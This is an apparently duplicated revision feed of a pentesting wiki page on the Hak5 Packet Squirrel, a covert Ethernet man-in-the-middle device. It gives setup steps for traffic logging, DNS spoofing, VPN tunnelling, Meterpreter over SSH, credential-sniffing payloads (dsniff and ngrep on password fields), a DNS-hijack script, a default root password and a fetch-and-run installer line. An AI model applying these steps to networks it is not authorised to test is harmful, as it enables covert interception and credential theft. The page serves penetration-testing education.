 tun0 &lt;br /&gt;
      Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00&lt;br /&gt;
      inet addr:192.168.231.245 P-t-P:192.168.231.245 Mask:255.255.255.0&lt;br /&gt;
      UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1&lt;br /&gt;
      RX packets:12 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
      TX packets:8 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
      collisions:0 txqueuelen:100&lt;br /&gt;
      RX bytes:1404 (1.3 KiB) TX bytes:608 (608.0 B)&lt;br /&gt;
&lt;br /&gt;
The Access Mode can be used to access an Private network that is used for testing and pen testing purposes like an honeypot virtual machine.&lt;br /&gt;
&lt;br /&gt;
==== Tunneling Mode ====&lt;br /&gt;
&lt;br /&gt;
The Tunnelling mode encapsulates all the traffic and sends it to the VPN Server, from where it is send to the internet. VPN Tunnelling allows users to disguise their IP address you can check your current IP address with [https://www.ipchicken.com ipchicken.com].&lt;br /&gt;
&lt;br /&gt;
You can also install an simple openVPN Server on a linux machine with&lt;br /&gt;
&amp;lt;code&amp;gt;wget https://git.io/vpn -O openvpn.sh &amp;amp;&amp;amp; bash openvpn.sh&amp;lt;/code&amp;gt;&lt;br /&gt;
and press Enter 6 times.&lt;br /&gt;
Then copy the generated client.ovpn file to Packet Squirrel in the /payload/switch3 folder and restart it with the switch on third position.&lt;br /&gt;
=== Meterpreter-via-SSH ===&lt;br /&gt;
[[File:Packet squirrel meterpreter ssh.PNG |thumb|right|400px||Packet Squirrel Payload Meterpreter-via-SSH settings]]&lt;br /&gt;
This payload starts the Packet Squirrel in NAT mode and waits for user input. When the button is pressed, the payload connects to a remote SSH server and creates a local port tunnel. It then launches a meterpreter shell over the tunnel.&lt;br /&gt;
The intent is to hide the meterpreter network traffic behind a legitimate SSH activity.&lt;br /&gt;
You can download this payload from the offical [https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library/remote-access/Meterpreter-via-SSH hak5 github].&lt;br /&gt;
==== Getting Started ====&lt;br /&gt;
Copy the playload to the Packet Squirrel into the desired switch folder. Now edit the scirpt to configure your server  options:&lt;br /&gt;
* SSH_USER - username on remote SSH server&lt;br /&gt;
* SSH_HOST - ip address of remote SSH Server&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; If you changed the default meterpreter port don&#039;t forget to change it on the metasploit side as well.&lt;br /&gt;
* MSF_PORT&lt;br /&gt;
&lt;br /&gt;
===== Generate SSH Key on Squirrel =====&lt;br /&gt;
Now you have to generate an ssh key-pair (just use default location and empty password) on your Packet Squirrel:&lt;br /&gt;
 root@squirrel:~# ssh-keygen&lt;br /&gt;
===== Allow Squirrel on SSH Server =====&lt;br /&gt;
Then you have to copy the contents of /root/.ssh/id_rsa.pub from Packet Squirrel to the SSH Server authorized file:&lt;br /&gt;
&lt;br /&gt;
 user@server:~# mkdir ~/.ssh&lt;br /&gt;
 user@server:~# echo &#039;paste id_rsa.pub contents inside this quote&#039; &amp;gt; ~/.ssh/authorized_keys&lt;br /&gt;
===== Run Metasploit with Resource =====&lt;br /&gt;
 msf@server:~# msfconsole -r server.rc&lt;br /&gt;
&lt;br /&gt;
==== LED Definitions ====&lt;br /&gt;
# Configure NETMODE&lt;br /&gt;
#* Solid Magenta&lt;br /&gt;
# Connect to SSH Server&lt;br /&gt;
#* SUCCESS - Blink Amber 5 Times&lt;br /&gt;
#* FAIL - Blink Red 2 Times&lt;br /&gt;
# Launch meterpreter&lt;br /&gt;
#* SUCESS - Blink Cyan 1 Time&lt;br /&gt;
#* FAIL - Blink Red 1 Time&lt;br /&gt;
&lt;br /&gt;
==== Hardening Recommendations ====&lt;br /&gt;
# Use an accout with limited privileges for SSH acces on the server.&lt;br /&gt;
# User a dedicated account for Packet Squirrel device (audit usage with SSH access logs).&lt;br /&gt;
# Disable PasswordAuthentication in sshd_config on the server.&lt;br /&gt;
&lt;br /&gt;
=== ISpyintel ===&lt;br /&gt;
[[File:Packet squirrel ispyintel.PNG |thumb|right|400px||Packet Squirrel Payload ISpyIntel settings]]&lt;br /&gt;
This payload will automate gathering various recon data on whatever passes between it&#039;s Ethernet ports. You can download this payload from the [https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library/sniffing/ispyintel official hak5 github].&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; This payload requires a usb stick to store loot.&lt;br /&gt;
==== Setup ====&lt;br /&gt;
# Edit the config variables at the top. The main variables are:&lt;br /&gt;
## &amp;lt;code&amp;gt;lootPath=&amp;quot;/mnt/loot/intel&amp;quot;  # Path to loot&amp;lt;/code&amp;gt;&lt;br /&gt;
## &amp;lt;code&amp;gt;mode=&amp;quot;TRANSPARENT&amp;quot;          # Network mode we want to use&amp;lt;/code&amp;gt;&lt;br /&gt;
## &amp;lt;code&amp;gt;interface=&amp;quot;br-lan&amp;quot;          # Interface to listen on&amp;lt;/code&amp;gt;&lt;br /&gt;
# Copy payload.sh into the ~/payloads/switch folder you wish to deploy on.&lt;br /&gt;
# Connect into a target machine with access to the LAN.&lt;br /&gt;
# Set switch to the spot and power up.&lt;br /&gt;
# Leave, get coffee, take a nap while everything is recorded and parsed for future use.&lt;br /&gt;
# When done; hit the button. The LED will rapidly flash white to let you know it is finishing up.&lt;br /&gt;
# When all is done the LED will just go blank. It is now safe to unplug and go about your day.&lt;br /&gt;
&lt;br /&gt;
==== Tasks that are started ====&lt;br /&gt;
* tcpdump - records every packet that was send and received&lt;br /&gt;
* urlsnarf - collects all websites that were visited&lt;br /&gt;
* dsniff - attempts to acquire passwords and what not&lt;br /&gt;
* ngrep - on ports 80 and 21 with the filter for common password fields&lt;br /&gt;
* ngrep - on ports 80 and 21 with the filter for common session id fields&lt;br /&gt;
* log.txt - logs the progress of the payload for troubleshooting&lt;br /&gt;
&lt;br /&gt;
==== Clean Up ====&lt;br /&gt;
Once the button is pressed the payload will automatically parse the TCPDump log file for the following items and store the results in seperate files.&lt;br /&gt;
As this process can take some time the LED will change to a rapid white blink letting you know the button command was recieved and the payload is in the process of shutting down.&lt;br /&gt;
* ipv4found.txt Will contain a unique list of all the ipv4 which the pcap file contains&lt;br /&gt;
* maybeEmails.txt Is a very loose search for possible email addresses that came across the wire in plain text.&lt;br /&gt;
&lt;br /&gt;
=== Creating your own Payloads ===&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel allows us to create our own attack payloads by loading them to the USB stick and naming them Switch1 to Switch3.&lt;br /&gt;
It allows as to create payload in python, bash or PHP. For Python and Bash it is important to use the interpreter directive Python: &amp;lt;code&amp;gt;#!/usr/bin/python&amp;lt;/code&amp;gt;, bash: &amp;lt;code&amp;gt;#!/usr/bin/bash&amp;lt;/code&amp;gt;.&lt;br /&gt;
Bash scripts can access the following pre-installed tools:&lt;br /&gt;
openvpn, autossh, tcpdump, meterpreter-https, cron, nmap, ncat-ssl, ncat, sshfs, tcpdump and wget&lt;br /&gt;
&lt;br /&gt;
The featured Squirrel Script offers the following additional commands:&lt;br /&gt;
&lt;br /&gt;
* NETMODE&lt;br /&gt;
specifies which network mode Packet Sqirrel uses and how traffic is routed&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Command !! Description&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE BRIDGE || Creates a bridge between the IN and OUT ehternet interface, with an own IP address for Packet Sqirrel&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE TRANSPARENT || Also creates a bridge between the interfaces but with no own IP address&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE NAT || Packet Squirrel gets an IP address from the target network, the client gets an IP from Packet Squirrel&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE VPN || same as NAT with VPN interface for client tunneling&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE CLONE || Clones the MAC address from the target client and uses it to connect to the LAN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* LED&lt;br /&gt;
with this command the multi-color LED can be controlled &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Possible configurations !! Description&lt;br /&gt;
|-&lt;br /&gt;
| LED Colors || red, green, blue, yellow, cyan, magenta, white&lt;br /&gt;
|-&lt;br /&gt;
| LED Patterns || SOLID, SLOW, FAST, SINGLE, DOUBLE, TRIPLE, SUCCESS, 1-10000&lt;br /&gt;
|-&lt;br /&gt;
| LED State || SETUP, FAIL, ATTACK, STAGE, SPECIAL, CLEANUP, FINISH&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* BUTTON&lt;br /&gt;
The BUTTON command pauses the paylpoad until the hardware button is pressed or a specified time has passed&lt;br /&gt;
&lt;br /&gt;
* SWITCH&lt;br /&gt;
The SWITCH command returns the current position of the hardware payload selection switch. Output is &amp;quot;switch1&amp;quot;, &amp;quot;switch2&amp;quot;, &amp;quot;switch3&amp;quot; or &amp;quot;switch4&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
==== Example ====&lt;br /&gt;
[[File:Hak5 C2 start.jpg |thumb|right|400px||C2 server start]]&lt;br /&gt;
[[File:Hak5 c2 dashboard.jpg |thumb|right|400px||C2 Dashboard]]&lt;br /&gt;
[[File:Hak5 c2 sqirrel.jpg |thumb|right|400px||C2 Packet Squirrel]]&lt;br /&gt;
&lt;br /&gt;
Here is an example for the usage of Squirrel Script.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Title: Caternet&lt;br /&gt;
# Author: Hak5Darren&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Description: Forwards all traffic to local webserver hosting cat photos.&lt;br /&gt;
# Props: In loving memory of Hak5Kerby&lt;br /&gt;
&lt;br /&gt;
LED SETUP&lt;br /&gt;
NETMODE NAT&lt;br /&gt;
echo &amp;quot;address=/#/172.16.32.1&amp;quot; &amp;gt; /tmp/dnsmasq.address&lt;br /&gt;
/etc/init.d/dnsmasq restart&lt;br /&gt;
&lt;br /&gt;
LED ATTACK&lt;br /&gt;
iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53&lt;br /&gt;
python -m SimpleHTTPServer 80&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
For more information go to the [https://docs.hak5.org/hc/en-us/sections/360002180414-Payload-Development hak5.org webpage].&lt;br /&gt;
&lt;br /&gt;
== with Cloud C2 ==&lt;br /&gt;
&lt;br /&gt;
The [[Hak5 Cloud C2]] is a command and control server for Hak5 devices. Installation and startup is shown in figure &amp;quot;C2 server start&amp;quot;. By browsing to the configured address you can login to the dashboard, shown in figure &amp;quot;C2 dashboard&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
To connect the Packet Squirrel with your C2 Cloud, click on the plus button in the lower right corner and choose the device. On the dashboard, open the added device and click on Setup, as shown in figure &amp;quot;C2 Packet Sqirrel&amp;quot;. Then copy the downloaded file to the Packet Squirrel&#039;s /etc folder and reboot it. &lt;br /&gt;
In the Overview tab you can also Edit, Reboot, Wipe and Remove your device. &lt;br /&gt;
&lt;br /&gt;
In the Clients tab you can see all clients which were connected to your Packet Squirrel with hostname, MAC and IP address. In the Loot tab, you can open the current loot from your Packet Squirrel directly on your C2 server. And in the Terminal tab you can open a ssh session to your device.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Packet Squirrel]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360000982574-Packet-Squirrel&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360001177114-Cloud-C2&lt;br /&gt;
* https://downloads.hak5.org/&lt;br /&gt;
&lt;br /&gt;
[[Category:Pentesting]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_Packet_Squirrel&amp;diff=6097</id>
		<title>Hak5 Packet Squirrel</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_Packet_Squirrel&amp;diff=6097"/>
		<updated>2021-03-09T15:37:15Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* Description */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
[[File:Packet Squirrel Connectors.jpg |thumb|right|400px||Packet Squirrel device]]&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel operates as an Ethernet Man in the Middle and comes  preloaded with three exploit scripts. These three attack modes are Logging Network Traffic, Spoofing DNS and OpenVPN Tunnel. These can also be modified and exchanged with other scripts. It&#039;s stealthy pocket-size enables it to be placed without notice, this can come in handy for penetration testers. The efficient energy usage makes it possible to power it with a battery pack to run over a week.&lt;br /&gt;
The Packet Squirrel can also be combined with the [[Hak5 Cloud C2]], a command and control server specially for Hak5 devices.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
[[File:Hak5_Squirrel_version.jpg|thumb|right|400px||SSH connect]]&lt;br /&gt;
[[File:Hak5_Squirrel_spoofhost.jpg|thumb|right|400px||spoofhost file]]&lt;br /&gt;
[[File:Hak5_Squirrel_browser.jpg|thumb|right|400px||Spoofed browser warning]]&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel has an switch to choose between the three exploit payloads for logging the TCP dump, Using VPN Tunnelling and for DNS spoofing, or Arming Mode.&lt;br /&gt;
 &lt;br /&gt;
In &#039;&#039;&#039;Arming Mode&#039;&#039;&#039; (switch in 4th position, nearest to the USB port) you can easily access the device with ssh &amp;lt;code&amp;gt;root@172.16.32.1&amp;lt;/code&amp;gt; with the password &amp;lt;code&amp;gt;hak5squirrel&amp;lt;/code&amp;gt;. Therefore Packet Squirrel acts as DHCP server. If you don&#039;t get an IP address, manually configure an IP from the 172.16.32.0/24 network on your ethernet interface. Arming Mode is indicated by a blue blinking LED an allows to configure the different payloads.&lt;br /&gt;
&lt;br /&gt;
It is also possible to gain ssh access to the device during the attack modes with the IP address of the outgoing Ethernet interface as well.    &lt;br /&gt;
&lt;br /&gt;
==== Basic Cable Setup ====&lt;br /&gt;
&lt;br /&gt;
# Plug the victims Ethernet cable into the &amp;quot;Ethernet In&amp;quot; Port&lt;br /&gt;
# Plug the gateway Ethernet cable  into the &amp;quot;Ethernet Out&amp;quot; Port&lt;br /&gt;
# Power the device by plugging in the power cable&lt;br /&gt;
&lt;br /&gt;
==== Firmware Upgrade ====&lt;br /&gt;
&lt;br /&gt;
Shiped devices are installed with version 1.0, which can be seen in the VERSION file in the Packet Squirrel root folder. The current version 3.2 can be downloaded from the Hak5 website.&lt;br /&gt;
&lt;br /&gt;
The file has to be named upgrade-version.bin (where version stands for the version number) and copied to the root directory of an NTFS or EXT4 formatted USB drive.&lt;br /&gt;
&lt;br /&gt;
Plug in the USB drive in the Packet Squirrel and set the select switch to Arming Mode. Then power on the Packet Squirrel. &lt;br /&gt;
&lt;br /&gt;
The upgrade process needs 5 minutes and is indicated by a solid red or blue LED light. When the firmware upgrade is finished, Packet Squirrel reboots and goes in Arming Mode. Shown by a blue blinking LED. &lt;br /&gt;
&lt;br /&gt;
Then you can connect again with SSH and verify the new version, shown in Figure &amp;quot;SSH connect&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
== Payloads ==&lt;br /&gt;
&lt;br /&gt;
=== Logging Network Traffic ===&lt;br /&gt;
&lt;br /&gt;
This mode creates TCP/UDP dumps and saves them on the USB drive to analyse later on.&lt;br /&gt;
Just follow these easy steps:&lt;br /&gt;
&lt;br /&gt;
# A USB Stick with an NTFS file system needs to be plugged in the USB-A Port before the Squirrel is Powered up. &lt;br /&gt;
# Flip the first position (which is nearest to the micro USB power in).&lt;br /&gt;
# Connect the Ethernet cable of the victim into the Ethernet port, which is at the same side as the power in USB connector and Connect the Gateway Ethernet cable to the other Port.&lt;br /&gt;
# Plug the power cable in and wait the one minute long start up sequence. The device can be either powered by the victim machine or by an USB power bank.&lt;br /&gt;
# The data traffic will be captured, if the LED starts blinking Yellow. If otherwise the LED circles between red, green and blue, then the USB stick has the wrong file system.&lt;br /&gt;
# Stop the capturing process by pressing the Button. Then the device takes some seconds to write the tcpdum to the USB Storage. As soon as the LED glows red the saving process has ended and you are good to go.&lt;br /&gt;
# You can now analyse the captured pcap file, located in \loot\tcpdump with [[Wireshark]].&lt;br /&gt;
&lt;br /&gt;
After that, the connection trough the Packet Squirrel is shut down. To allow the client to connect to the network again, Packet Squirrel has to be rebooted.&lt;br /&gt;
&lt;br /&gt;
=== DNS Spoofing Mode ===&lt;br /&gt;
&lt;br /&gt;
This mode spoofs the client with DNS entries to redirect traffic to other IP addresses.&lt;br /&gt;
&lt;br /&gt;
# For this mode we have to start in arming mode (switch at fourth position)&lt;br /&gt;
# After gaining access with ssh we change to the DNS spoofing directory with &amp;lt;code&amp;gt;cd /payloads/switch2&amp;lt;/code&amp;gt;.&lt;br /&gt;
# There we can define the Spoofed domain names by editing the file spoofhost with &amp;lt;code&amp;gt;nano spoofhost&amp;lt;/code&amp;gt;.&lt;br /&gt;
# In the file add entrys like &amp;lt;code&amp;gt;address=/myspoofdomain.at/194.232.104.140&amp;lt;/code&amp;gt; as shown in figure &amp;quot;spoofhost file&amp;quot;. The example IP belongs to orf.at&lt;br /&gt;
# Unplug the Packet Squirrel and shift the switch to the second position.&lt;br /&gt;
# Plug it in and wait until the startup sequence is finished and the LED starts blinking yellow.&lt;br /&gt;
&lt;br /&gt;
By browsing to the spoofed domain, the request gets redirected to the given IP. As shown in figure &amp;quot;Spoofed browser warning&amp;quot; browsers show certificate alerts because the domain and certificate do not match. But this mode can still be used to attack other applications which use domains with no validation.&lt;br /&gt;
&lt;br /&gt;
=== OpenVPN Mode ===&lt;br /&gt;
[[File:Packet Squirrel VPN1.jpg |thumb|right|400px||OpenVPN Access Mode]]&lt;br /&gt;
[[File:Packet Squirrel VPN2.jpg |thumb|right|400px||OpenVPN Tunneling Mode]]&lt;br /&gt;
&lt;br /&gt;
The VPN payload implements VPN access mode and VPN tunnelling mode. &lt;br /&gt;
If you want to Setup your own OpenVPN (OVPN) server follow the instructions at the [https://docs.hak5.org/hc/en-us/articles/360010554013-OpenVPN-Payload hak5 webpage]. For the purpose of testing we use use an existing server from [https://www.freeopenvpn.org/en/ freeopenvpn.org]. &lt;br /&gt;
# Start by selecting the desired server and download the the OVPN access certificate.&lt;br /&gt;
# Set the Packet Squirrel in Arming Mode and connect to its shell&lt;br /&gt;
# Copy the certificate with &amp;lt;code&amp;gt;scp user@server:downloadfolder/filename.ovpn /root/payloads/switch3/config.ovpn&amp;lt;/code&amp;gt;&lt;br /&gt;
# Steer to the directory with &amp;lt;code&amp;gt; cd /root/payloads/switch3/&amp;lt;/code&amp;gt;&lt;br /&gt;
# Edit the config.ovpn at line 30 to &amp;lt;code&amp;gt;auth-user-pass credentials.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
# Add an credentials file with  &amp;lt;code&amp;gt; nano credentials.txt&amp;lt;/code&amp;gt; and add the two lines:&lt;br /&gt;
## &amp;lt;code&amp;gt;freeopenvpn&amp;lt;/code&amp;gt; &lt;br /&gt;
## &amp;lt;code&amp;gt;&amp;lt;the displayed password&amp;gt;&amp;lt;/code&amp;gt; &lt;br /&gt;
# Before starting the VPN we choose the VPN mode:&lt;br /&gt;
## Open the &amp;lt;code&amp;gt;payload.sh&amp;lt;/code&amp;gt; &lt;br /&gt;
## Set the &amp;lt;code&amp;gt;For_Clients=&amp;lt;/code&amp;gt;  to&lt;br /&gt;
### &amp;lt;code&amp;gt;0&amp;lt;/code&amp;gt; for Access Mode&lt;br /&gt;
### &amp;lt;code&amp;gt;1&amp;lt;/code&amp;gt; for Tunneling Mode&lt;br /&gt;
# Now set the Switch the the third Position and plug power out and in again&lt;br /&gt;
# You are good to go, if the yellow LED starts to flash after the boot up sequence  &lt;br /&gt;
==== Access Mode ====&lt;br /&gt;
&lt;br /&gt;
Access mode allows the squirrel to access the VPN Network via the Secure Shell&lt;br /&gt;
If the connection was established if the command &amp;lt;code&amp;gt;ifconfig tun0&amp;lt;/code&amp;gt; show the following output when it is issued at the Packet Squirrels Shell.&lt;br /&gt;
 tun0 &lt;br /&gt;
      Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00&lt;br /&gt;
      inet addr:192.168.231.245 P-t-P:192.168.231.245 Mask:255.255.255.0&lt;br /&gt;
      UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1&lt;br /&gt;
      RX packets:12 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
      TX packets:8 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
      collisions:0 txqueuelen:100&lt;br /&gt;
      RX bytes:1404 (1.3 KiB) TX bytes:608 (608.0 B)&lt;br /&gt;
&lt;br /&gt;
The Access Mode can be used to access an Private network that is used for testing and pen testing purposes like an honeypot virtual machine.&lt;br /&gt;
&lt;br /&gt;
==== Tunneling Mode ====&lt;br /&gt;
&lt;br /&gt;
The Tunnelling mode encapsulates all the traffic and sends it to the VPN Server, from where it is send to the internet. VPN Tunnelling allows users to disguise their IP address you can check your current IP address with [https://www.ipchicken.com ipchicken.com].&lt;br /&gt;
&lt;br /&gt;
You can also install an simple openVPN Server on a linux machine with&lt;br /&gt;
&amp;lt;code&amp;gt;wget https://git.io/vpn -O openvpn.sh &amp;amp;&amp;amp; bash openvpn.sh&amp;lt;/code&amp;gt;&lt;br /&gt;
and press Enter 6 times.&lt;br /&gt;
Then copy the generated client.ovpn file to Packet Squirrel in the /payload/switch3 folder and restart it with the switch on third position.&lt;br /&gt;
=== Meterpreter-via-SSH ===&lt;br /&gt;
[[File:Packet squirrel meterpreter ssh.PNG |thumb|right|400px||Packet Squirrel Payload Meterpreter-via-SSH settings]]&lt;br /&gt;
This payload starts the Packet Squirrel in NAT mode and waits for user input. When the button is pressed, the payload connects to a remote SSH server and creates a local port tunnel. It then launches a meterpreter shell over the tunnel.&lt;br /&gt;
The intent is to hide the meterpreter network traffic behind a legitimate SSH activity.&lt;br /&gt;
You can download this payload from the offical [https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library/remote-access/Meterpreter-via-SSH hak5 github].&lt;br /&gt;
==== Getting Started ====&lt;br /&gt;
Copy the playload to the Packet Squirrel into the desired switch folder. Now edit the scirpt to configure your server  options:&lt;br /&gt;
* SSH_USER - username on remote SSH server&lt;br /&gt;
* SSH_HOST - ip address of remote SSH Server&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; If you changed the default meterpreter port don&#039;t forget to change it on the metasploit side as well.&lt;br /&gt;
* MSF_PORT&lt;br /&gt;
&lt;br /&gt;
===== Generate SSH Key on Squirrel =====&lt;br /&gt;
Now you have to generate an ssh key-pair (just use default location and empty password) on your Packet Squirrel:&lt;br /&gt;
 root@squirrel:~# ssh-keygen&lt;br /&gt;
===== Allow Squirrel on SSH Server =====&lt;br /&gt;
Then you have to copy the contents of /root/.ssh/id_rsa.pub from Packet Squirrel to the SSH Server authorized file:&lt;br /&gt;
&lt;br /&gt;
 user@server:~# mkdir ~/.ssh&lt;br /&gt;
 user@server:~# echo &#039;paste id_rsa.pub contents inside this quote&#039; &amp;gt; ~/.ssh/authorized_keys&lt;br /&gt;
===== Run Metasploit with Resource =====&lt;br /&gt;
 msf@server:~# msfconsole -r server.rc&lt;br /&gt;
&lt;br /&gt;
==== LED Definitions ====&lt;br /&gt;
# Configure NETMODE&lt;br /&gt;
#* Solid Magenta&lt;br /&gt;
# Connect to SSH Server&lt;br /&gt;
#* SUCCESS - Blink Amber 5 Times&lt;br /&gt;
#* FAIL - Blink Red 2 Times&lt;br /&gt;
# Launch meterpreter&lt;br /&gt;
#* SUCESS - Blink Cyan 1 Time&lt;br /&gt;
#* FAIL - Blink Red 1 Time&lt;br /&gt;
&lt;br /&gt;
==== Hardening Recommendations ====&lt;br /&gt;
# Use an accout with limited privileges for SSH acces on the server.&lt;br /&gt;
# User a dedicated account for Packet Squirrel device (audit usage with SSH access logs).&lt;br /&gt;
# Disable PasswordAuthentication in sshd_config on the server.&lt;br /&gt;
&lt;br /&gt;
=== ISpyintel ===&lt;br /&gt;
[[File:Packet squirrel ispyintel.PNG |thumb|right|400px||Packet Squirrel Payload ISpyIntel settings]]&lt;br /&gt;
This payload will automate gathering various recon data on whatever passes between it&#039;s Ethernet ports. You can download this payload from the [https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library/sniffing/ispyintel official hak5 github].&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; This payload requires a usb stick to store loot.&lt;br /&gt;
==== Setup ====&lt;br /&gt;
# Edit the config variables at the top. The main variables are:&lt;br /&gt;
## &amp;lt;code&amp;gt;lootPath=&amp;quot;/mnt/loot/intel&amp;quot;  # Path to loot&amp;lt;/code&amp;gt;&lt;br /&gt;
## &amp;lt;code&amp;gt;mode=&amp;quot;TRANSPARENT&amp;quot;          # Network mode we want to use&amp;lt;/code&amp;gt;&lt;br /&gt;
## &amp;lt;code&amp;gt;interface=&amp;quot;br-lan&amp;quot;          # Interface to listen on&amp;lt;/code&amp;gt;&lt;br /&gt;
# Copy payload.sh into the ~/payloads/switch folder you wish to deploy on.&lt;br /&gt;
# Connect into a target machine with access to the LAN.&lt;br /&gt;
# Set switch to the spot and power up.&lt;br /&gt;
# Leave, get coffee, take a nap while everything is recorded and parsed for future use.&lt;br /&gt;
# When done; hit the button. The LED will rapidly flash white to let you know it is finishing up.&lt;br /&gt;
# When all is done the LED will just go blank. It is now safe to unplug and go about your day.&lt;br /&gt;
&lt;br /&gt;
==== Tasks that are started ====&lt;br /&gt;
* tcpdump - records every packet that was send and received&lt;br /&gt;
* urlsnarf - collects all websites that were visited&lt;br /&gt;
* dsniff - attempts to acquire passwords and what not&lt;br /&gt;
* ngrep - on ports 80 and 21 with the filter for common password fields&lt;br /&gt;
* ngrep - on ports 80 and 21 with the filter for common session id fields&lt;br /&gt;
* log.txt - logs the progress of the payload for troubleshooting&lt;br /&gt;
&lt;br /&gt;
==== Clean Up ====&lt;br /&gt;
Once the button is pressed the payload will automatically parse the TCPDump log file for the following items and store the results in seperate files.&lt;br /&gt;
As this process can take some time the LED will change to a rapid white blink letting you know the button command was recieved and the payload is in the process of shutting down.&lt;br /&gt;
* ipv4found.txt Will contain a unique list of all the ipv4 which the pcap file contains&lt;br /&gt;
* maybeEmails.txt Is a very loose search for possible email addresses that came across the wire in plain text.&lt;br /&gt;
&lt;br /&gt;
=== Creating your own Payloads ===&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel allows us to create our own attack payloads by loading them to the USB stick and naming them Switch1 to Switch3.&lt;br /&gt;
It allows as to create payload in python, bash or PHP. For Python and Bash it is important to use the interpreter directive Python: &amp;lt;code&amp;gt;#!/usr/bin/python&amp;lt;/code&amp;gt;, bash: &amp;lt;code&amp;gt;#!/usr/bin/bash&amp;lt;/code&amp;gt;.&lt;br /&gt;
Bash scripts can access the following pre-installed tools:&lt;br /&gt;
openvpn, autossh, tcpdump, meterpreter-https, cron, nmap, ncat-ssl, ncat, sshfs, tcpdump and wget&lt;br /&gt;
&lt;br /&gt;
The featured Squirrel Script offers the following additional commands:&lt;br /&gt;
&lt;br /&gt;
* NETMODE&lt;br /&gt;
specifies which network mode Packet Sqirrel uses and how traffic is routed&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Command !! Description&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE BRIDGE || Creates a bridge between the IN and OUT ehternet interface, with an own IP address for Packet Sqirrel&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE TRANSPARENT || Also creates a bridge between the interfaces but with no own IP address&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE NAT || Packet Squirrel gets an IP address from the target network, the client gets an IP from Packet Squirrel&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE VPN || same es NAT with VPN interface for client tunneling&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE CLONE || Clones the MAC address from the target client and uses it to connect to the LAN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* LED&lt;br /&gt;
with this command the multi-color LED can be controlled &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Possible configurations !! Description&lt;br /&gt;
|-&lt;br /&gt;
| LED Colors || red, green, blue, yellow, cyan, magenta, white&lt;br /&gt;
|-&lt;br /&gt;
| LED Patterns || SOLID, SLOW, FAST, SINGLE, DOUBLE, TRIPLE, SUCCESS, 1-10000&lt;br /&gt;
|-&lt;br /&gt;
| LED State || SETUP, FAIL, ATTACK, STAGE, SPECIAL, CLEANUP, FINISH&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* BUTTON&lt;br /&gt;
The BUTTON command pauses the paylpoad until the hardware button is pressed or a specified time has passed&lt;br /&gt;
&lt;br /&gt;
* SWITCH&lt;br /&gt;
The SWITCH command returns the current position of the hardware payload selection switch. Output is &amp;quot;switch1&amp;quot;, &amp;quot;switch2&amp;quot;, &amp;quot;switch3&amp;quot; or &amp;quot;switch4&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
==== Example ====&lt;br /&gt;
